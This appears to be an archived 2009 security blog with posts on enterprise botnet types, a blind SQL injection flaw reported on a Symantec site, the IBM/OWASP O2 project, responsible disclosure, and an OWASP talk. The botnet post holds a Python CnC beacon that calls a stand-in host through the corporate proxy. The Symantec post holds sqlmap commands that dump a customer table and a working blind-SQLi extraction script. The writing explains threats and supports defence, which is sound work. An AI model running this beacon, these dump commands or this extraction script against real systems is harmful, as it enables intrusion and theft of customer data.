Wednesday, November 25, 2009

Enterprise Botnets - Targeted or What?

What's the difference between those massive botnets gobbling up sizable chunks of the Internet and the ones found inside the enterprise? Quite a bit, actually.

Over the last couple of months I’ve been talking at a number of conferences and speaking with customers about the kinds of botnets we observe within enterprise networks, as opposed to what's generally seen propagating the Internet at large. As you’d expect, there are a number of differences – partly because of the types of bad actors targeting businesses, and partly because enterprise perimeter security is considerably more advanced than that found at the end of the average DSL Internet connection.

From a cross-network visibility perspective, the types of botnets regularly encountered operating within enterprises in 2009 can best be divided (and described) as follows:

Internet Targeted botnets – “broad-spectrum” attacks, for want of a better description – account for approximately half of all botnets regularly encountered inside enterprise networks. These botnets aren’t targeted at any particular network – just at the average Internet user – but they typically manage to infiltrate enterprise networks due to lax security policies and as bleed-over from the other networks (and devices) employees may connect to. I discussed some of this in an earlier blog – Botnet bleed-over in to the enterprise – in which botnets designed to steal online gaming authentication credentials often appear within the enterprise. Just about all of these broad-spectrum botnets can self-propagate using an assortment of built-in worming capabilities. Fortunately, nearly every one of them is easily detected with standard host-based antivirus products.

What this means in practice, however, is that hosts “not quite” adhering to the corporate security policy, or a little behind in applying the latest patches (including not running the very latest signatures for their antivirus package), are the first to fall victim – and no organization I’ve observed in the last 20 years has ever managed to implement its security uniformly throughout the entire enterprise.

I foresee that these “broad-spectrum” botnets will continue to appear within enterprises and be a nuisance to enterprise security teams. That said, just because they aren’t targeted and fixes are available doesn’t mean there’s no threat. If a particular botnet agent doesn’t yield value to its original botnet master (e.g. a botnet focused on obtaining passwords for social networking sites), it is quickly passed on to other operators who can make money from it – repurposing the compromised host and installing new malware agents that will yield value to the new owner.

Enterprise Targeted botnets are hardly ever found circulating the Internet at large, and are designed to penetrate and propagate within enterprise networks alone. Around 35% of botnets encountered within enterprise networks are of this type. They are typically based upon sophisticated multi-purpose Remote Access Trojans (RATs), often blended with worming functions capable of using exploits against standard network services (services that are typically blocked by perimeter firewall technologies). Perhaps the most visible identifier of a botnet targeted at enterprises is native support for network proxies – i.e. they’re proxy-aware – and the ability to leverage the user’s credentials to navigate command and control (CnC) traffic out of the network.
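To make “proxy-aware” concrete, here is a minimal Python sketch of what such an agent’s check-in logic amounts to. The CnC URL and check-in format are entirely hypothetical, and a real enterprise-targeted agent would go further – replaying the logged-in user’s NTLM/Kerberos credentials so the proxy sees what looks like an ordinary browsing session:

    import urllib.request

    def beacon(cnc_url="http://cnc.example.com/checkin"):  # hypothetical CnC endpoint
        # getproxies() picks up the same proxy configuration the user's browser
        # relies on (environment variables, or the registry on Windows), so the
        # agent never needs a direct - and usually blocked - route out.
        proxies = urllib.request.getproxies()
        opener = urllib.request.build_opener(urllib.request.ProxyHandler(proxies))
        # The CnC traffic rides out through the corporate proxy as
        # ordinary-looking HTTP, blending in with legitimate web browsing.
        return opener.open(cnc_url, timeout=30).read()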

In general, these “targeted” botnets aren’t aimed at one specific organization, but at a particular industry (e.g. online retail companies) or category of personnel within the organization (e.g. the CFO). The botnet agents tend to be more advanced (on average) than most botnet malware encountered within enterprise networks – offering greater flexibility for the botnet masters to navigate the network and compromise key assets, and to extract any valuable information they manage to obtain.

Deep Knowledge botnets are a completely different beast. Accounting for 10% of the botnets encountered within typical enterprise networks, these botnets tend to rely upon off-the-shelf malware components (more often than not, being built from commercial DIY malware creator kits). Depending upon the investment made by the botnet master, the features of the botnet agent can be very sophisticated or run-of-the-mill. What makes them so dangerous though is that the creator (who is often the botnet master) has a high degree of knowledge about the infiltrated enterprise – and already knows where to find all the valuable information. In some cases specific people or systems are targeted as beachheads into the organization, while in others key organization-specific credentials are used to navigate the network.

Where this “deep knowledge” comes from can vary considerably. Each botnet within this category tends to be unique. I’ve come to associate these botnets with past or present employees (rather than industrial espionage) – as it’s not uncommon to be able to trace the CnC server of the botnet to a DSL or cable Internet IP address in the same city as the office or building that has been breached. In some cases I wouldn’t be surprised if the installation of these botnet agents was conducted by hand as a means of (semi)legitimate remote administration (think back to the problem in the mid-1990s, when people were installing modems in their work computers so they could access them remotely). The problem though is that most of these commercial DIY malware construction kits have been backdoored by their creators (or by “partners” in their distribution channel) – which means that any corporate assets infected with the botnet agent will find themselves under the control of multiple remote users.

“Other” represents the catch-all for the remaining 5% of botnets encountered within enterprise networks. These botnets (and the malware they rely upon) vary considerably in both sophistication and functionality, and don’t fit neatly into any of the previous three categories. They range from small botnets targeted at an organization for competitive advantage, through to what can only be guessed to be state-sponsored tools targeting specific industries and technologies.

It’ll be interesting to see how the distribution of these four categories of botnets changes in 2010. I suspect that the proportions will remain roughly the same – with the “other” category decreasing over time, and being largely absorbed into the “Enterprise Targeted” category rather than “Deep Knowledge”.

==> Reposted from http://blog.damballa.com/

Monday, November 23, 2009

Symantec Site Vulnerable to Blind SQL Injection

It looks as if Symantec has a bit of a problem with Blind SQL Injection. Unu has uncovered a vulnerability lying in one of Symantec's public Internet portals.

Using a couple of off-the-shelf tools - Pangolin and sqlmap - it's possible to enumerate the back-end databases supporting the public Internet web site - and this is what Unu appears to have done.
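For a sense of how little effort is involved, a typical sqlmap session against a vulnerable parameter boils down to a handful of commands - the URL, parameter and database/table names below are purely illustrative, not Symantec's:

    python sqlmap.py -u "http://www.example.com/page.php?id=1" --dbs
    python sqlmap.py -u "http://www.example.com/page.php?id=1" -D storedb --tables
    python sqlmap.py -u "http://www.example.com/page.php?id=1" -D storedb -T customers --dump

The tool fingerprints the back-end DBMS, selects a workable injection technique, and automates all of the request/response analysis from there.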

Blind SQLi isn't a particularly sophisticated vulnerability, but it is often a labor-intensive type of attack - not to mention rather noisy (due to the repeated requests and the incremental guessing of the characters that make up the database objects). That said, there are a bundle of tools out there that'll do all this work for you - so you don't need to be particularly security-savvy to do this. In fact, you probably don't even need to know what SQL is, since the tools take care of everything for you.
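To show just how mechanical that incremental guessing is, here's a simplified Python sketch of the boolean-based inference loop these tools automate. The target URL, the "true page" marker and the MySQL-flavored predicates are all hypothetical, and this sort of probing is only appropriate against applications you're authorized to test:

    import urllib.parse
    import urllib.request

    TARGET = "http://test.example.com/item.php?id=1"  # hypothetical vulnerable URL
    TRUE_MARKER = "In stock"  # text rendered only when the injected predicate is true

    def oracle(predicate):
        # Ask the application one yes/no question: append " AND <predicate>"
        # to the vulnerable parameter and check which page comes back.
        url = TARGET + urllib.parse.quote(" AND " + predicate)
        page = urllib.request.urlopen(url, timeout=10).read().decode(errors="replace")
        return TRUE_MARKER in page

    def extract(expr, max_len=32):
        # Recover the result of <expr> (e.g. "SELECT database()") one character
        # at a time, binary-searching each character's code point - roughly 7
        # requests per character rather than ~95 sequential guesses.
        result = ""
        for pos in range(1, max_len + 1):
            lo, hi = 32, 126
            if not oracle("ASCII(SUBSTRING((%s),%d,1))>=%d" % (expr, pos, lo)):
                break  # ran past the end of the string
            while lo < hi:
                mid = (lo + hi + 1) // 2
                if oracle("ASCII(SUBSTRING((%s),%d,1))>=%d" % (expr, pos, mid)):
                    lo = mid
                else:
                    hi = mid - 1
            result += chr(lo)
        return result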

I discussed some of this the other week at the OWASP conference. Today these kinds of tools and features are becoming standard within botnets - which means that exploitation of these vulnerabilities and enumeration of the database's data can be conducted in a few minutes - way before a security team can actively respond to the attack and close down the breach and the loss of confidential data.
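The back-of-the-envelope math shows why a botnet makes the difference. Every figure in this little Python calculation is an illustrative assumption, not a measurement:

    requests_per_char = 7       # binary search over printable ASCII (see the sketch above)
    chars_to_extract = 50_000   # a modest table's worth of data, hypothetical
    rate_per_host = 5           # requests/sec one host can sustain without tripping alarms

    total = requests_per_char * chars_to_extract
    print(total / rate_per_host / 3600)        # one attacking host: ~19 hours
    print(total / (rate_per_host * 500) / 60)  # spread across 500 bots: ~2 minutes

Even with conservative per-bot request rates, distributing the character-guessing across a few hundred bots collapses the attack window from a working day to a coffee break.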

After enumerating the Symantec Web server, it would seem that there is data covering a number of Symantec products - Oasis, Northwind, OneCare - as well as a couple of very interesting storage points relating to Norton and SymantecStore.

Based upon what's visible on Unu's site, the Symantec store contains over 70,000 rows - which appear to be customer records, complete with clear-text passwords. That's bad and dumb! (Symantec should know better.)

Oh, and there appears to be something like 122k records associated with product serial numbers.

I'm hoping that Symantec are dealing with this vulnerability and closing it down (it's not clear whether Unu gave Symantec prior notice of the flaw). In the meantime, they may want to start looking for a new security vendor to do some WebApp pentests.

Tuesday, November 17, 2009

IBM, OWASP's O2 and Dinis

Last week I was in Washington DC speaking at the annual OWASP AppSec conference. While there, an acquaintance of mine - Dinis Cruz - posted a series of blogs concerning IBM, Ounce Labs, OWASP's O2 project and his own place in the equation - as well as presenting on the status of O2. The crux of the blog series is Dinis' analysis of why the recent purchase and integration of Ounce Labs into IBM could work (but isn't working), and of where O2 might find a home.

A few people have commented on the blog series - most notably RSnake - in particular as it relates to the O2 project.

To be perfectly honest I'm not that familiar with the O2 project - having never gotten my hands dirty playing with it - but I know from experience how valuable similar tool integration frameworks are. From a pure-play consulting perspective, the ability to automate the dissection of results from multiple static analysis tools is money in the bank, and as such most security consulting practices offering code analysis services have typically invested their own time and money building similar tools. But custom integration paths are a substantial cost to consulting companies - so an Open Source framework has a lot of appeal (if it's good enough).
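As a flavor of the glue code consulting practices end up writing, here's a minimal Python sketch that normalizes findings from two hypothetical static-analysis report formats into a single schema for deduplication and triage - the tool names and report fields are placeholders, not any real product's format:

    import csv
    import json
    from dataclasses import dataclass

    @dataclass(frozen=True)
    class Finding:
        tool: str
        file: str
        line: int
        rule: str
        severity: str

    def load_tool_a(path):
        # Hypothetical tool A emits a JSON report with an "issues" array.
        with open(path) as f:
            for item in json.load(f)["issues"]:
                yield Finding("tool_a", item["file"], item["line"],
                              item["checker"], item["severity"].lower())

    def load_tool_b(path):
        # Hypothetical tool B emits CSV with File/Line/Rule/Priority columns.
        with open(path) as f:
            for row in csv.DictReader(f):
                yield Finding("tool_b", row["File"], int(row["Line"]),
                              row["Rule"], row["Priority"].lower())

    def merge(*streams):
        # Group findings by (file, line, rule): two tools flagging the same
        # spot is one issue to triage, and the overlap is itself a useful
        # confidence signal when prioritizing manual review.
        grouped = {}
        for f in (finding for stream in streams for finding in stream):
            grouped.setdefault((f.file, f.line, f.rule), []).append(f)
        return grouped

Frameworks like O2 aim to make exactly this sort of plumbing reusable, rather than rebuilt from scratch inside every consultancy.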

That said, Open Source projects like O2 typically have little to no appeal for any but the smallest MSSPs and SaaS providers. Such service providers - seeking to build managed offerings around the integration and consolidated output of commercial (and freeware) tools - face intense pressure from investors (and potential acquisition/merger partners) not to include Open Source code, due to licensing and intellectual property disclosure concerns. Taking O2 down a commercial route eventually (or offering a separate route, like Snort/Sourcefire) would however have appeal in these cases.

Shifting focus back to IBM and the acquisition and integration of Ounce Labs technology into the Rational software portfolio - I share several of Dinis' concerns. From what I understand (and overheard at the OWASP conference), the Ounce Labs technologies are rolling under the Watchfire product team and being integrated together - which I would see as a sensible course of action, but one that would effectively mean the end of the "Ounce Labs" brand/product label. Not that that really matters to the market, but it does tend to turn off many of the employees who transitioned to IBM as part of the acquisition. Having said all that, the Watchfire team are a bunch of very smart people, and they were already well on the way to developing their own static analysis tools that would have directly competed with Ounce Labs' (at least for the Web-based language frameworks) - so this current integration is largely a technology-path accelerator rather than a purchase of new technology.

Dinis proposes a story - well, more of a "plot" - in which IBM can fulfil the requirements of a fictitious customer with an end-to-end solution. His conclusion is that IBM has all the necessary components and is more than capable of building the ultimate solution - but it's going to be a hard path and may never happen in practice.

I can understand the motivations behind his posts - particularly after personally passing through the IBM acquisition and integration of ISS. IBM has so much potential. It has some of the brightest researchers I have ever encountered in or out of academia, and some of the best-trained business executives in the world - however, it's a monster of a company, and internal conflict over ownership (of strategy, the customer, and key concepts such as "security") between divisions and "brands" appears all too often to sink even the best-laid plans and intentions.

My advice to Dinis in making up his mind whether to stay with IBM or to move on would be this... if you enjoy working on exciting problems, inventing new technologies and changing focus completely every 2-4 years, but aren't overly concerned whether your research and technology will actually make it into a commercial product - then IBM is great (you can even start planning your retirement). However, if you're like me and the enjoyment lies in researching new technologies and solving problems in ways that customers will actually use, and that will be commercially available in the same year (or decade?) you worked on them, then it's unlikely you'd find IBM as fulfilling. IBM's solution momentum is unstoppable once it gets going - but it takes a long time to get things rolling, and it's pretty hard to change course once it's moving.

Sunday, November 15, 2009

"Responsible Disclosure" - Friend or Foe

It's been an interesting weekend on the "responsible disclosure" front. Reactions and tweet threads from several noted vulnerability researchers in response to K8em0's blog post (Behind the ISO Curtain) - most notably those of Halvar Flake via his post (Why are most researchers not a fan of standards on "responsible disclosure"?) - have been fast and (semi)furious.

On one hand it seems like a typical, dare I say "annual", flare-up on the topic. But then again, the specter of some ill-informed ISO standard being developed as a guide for defining and handling responsible disclosure was sure to escalate things.

To my mind, Halvar makes a pretty good argument for the position that any kind of "standard" isn't going to be worth the paper it's printed on. I particularly liked the metaphor...
"if I can actually go and surf, why would I discuss with a bunch of people sitting in an office about the right way to come back to the beach ?"
But the discussion isn't going away...

While I haven't seen anything on this ISO project (ISO/IEC NP 29147 Information technology - Security techniques - Responsible Vulnerability Disclosure), I strongly suspect that it has very little to do with independent vulnerability researchers themselves - and is more focused on how vendors should aim to disclose (and, dare I say, "coordinate" disclosures) publicly. Most vendor-initiated vulnerability disclosures have been responsible - but in cases where multiple vendors are involved, coordination often breaks down and slivers of 'ir' appear in front of 'responsible'. The bigger and more important a multi-vendor security vulnerability is, the more likely its disclosure will be screwed up.

Maybe this ISO work could help guide software vendors in dealing with security researchers and better handling disclosure coordination. It would be nice to think so.

Regardless, I think the work of ICASI is probably more useful - in particular the "Common Frameworks for Vulnerability Disclosure and Response (CVRF)" - and would probably bleed over into some ISO work eventually. There are only a handful of vendors participating in the consortium (Cisco, Microsoft, IBM, Intel, Juniper and Nokia), but at least they're getting their acts together and working out a solution for themselves. I may be a little biased though, since I was briefly involved with ICASI when I was with IBM. Coordination and responsible disclosure amongst these vendors is pretty important - eat your own dog food and all that lark.

At the end of the day, trying to impose standards for vulnerability disclosure upon independent researchers hasn't worked and isn't going to - even if these "standards" were ever to be enshrined into law.

Monday, November 9, 2009

Clubbing WebApps with a Botnet - OWASP AppSec 2009

Back from vacation, fully refreshed, and back to the blog (and conference speaking)...

This week I'll be in Washington DC for the annual OWASP US conference - AppSec USA 2009. I'm speaking Thursday morning (10:45am-11:30am) on the topic of "Clubbing Web Applications with a Botnet", where I'll be covering the threat to Web applications from botnets - in particular the way they can be (and are) used as force multipliers in brute-forcing and SQL Injection attacks.

A quick abstract for the talk is as follows:
The lonely hacker taking pot-shots at a Web application – seeking out an exploitable flaw – is quickly going the way of the dinosaur. Why try to hack an application from a solitary host using a single suite of tools when you can distribute and load-balance the attack amongst a global collection of anonymous bots and even ramp up the pace of attack by several orders of magnitude? If you’re going to _really_ hack a Web application for commercial gain, the everyday botnet is now core equipment in an attacker’s arsenal. Sure, DDoS and other saturation attacks are possible – but the real benefits of employing botnets to hack Web applications come from their sophisticated scripting engines and command & control, which allow even onerous blind-SQL-injection attacks to be conducted in minutes rather than days. If someone’s clubbing your Web application with a botnet, where are your weaknesses and how much time have you really got?
I spoke briefly on the topic earlier this year at the OWASP Europe conference, but will be covering some new research into techniques and trends - in particular the growing viability of Blind SQL Injection techniques.

If you happen to be in DC Thursday/Friday, drop by the conference. If you're already planning on attending the OWASP conference, make sure you attend my talk in the morning.